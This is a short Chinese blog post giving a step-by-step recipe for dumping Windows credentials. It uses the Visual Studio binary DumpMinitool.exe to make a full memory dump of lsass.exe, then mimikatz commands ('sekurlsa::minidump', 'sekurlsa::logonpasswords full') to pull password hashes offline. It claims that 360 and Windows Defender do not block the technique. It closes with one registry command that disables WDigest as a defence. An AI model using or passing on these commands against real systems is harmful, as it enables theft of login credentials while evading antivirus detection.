内存dump工具学习
(0)

内存dump工具学习

可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可

目录位置

C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensions

文件名:DumpMinitool.exe

使用命令:

DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式

查看lsass进程ID

dump完成后,再使用mimikatz进行离线解密即可

将lsass.dmp放置在mimikatz目录中,通过加载到mimikatz

sekurlsa::minidump lsass.dmp

导出密码散列值

sekurlsa::logonpasswords full

切记需要用管理员权限运行

免杀测试:360和Win10自带的defender杀软均不拦截。

沙箱检测:

1.png

防范

关闭wdigest,无法从内存中获得明文密码

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

本文为作者admin发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论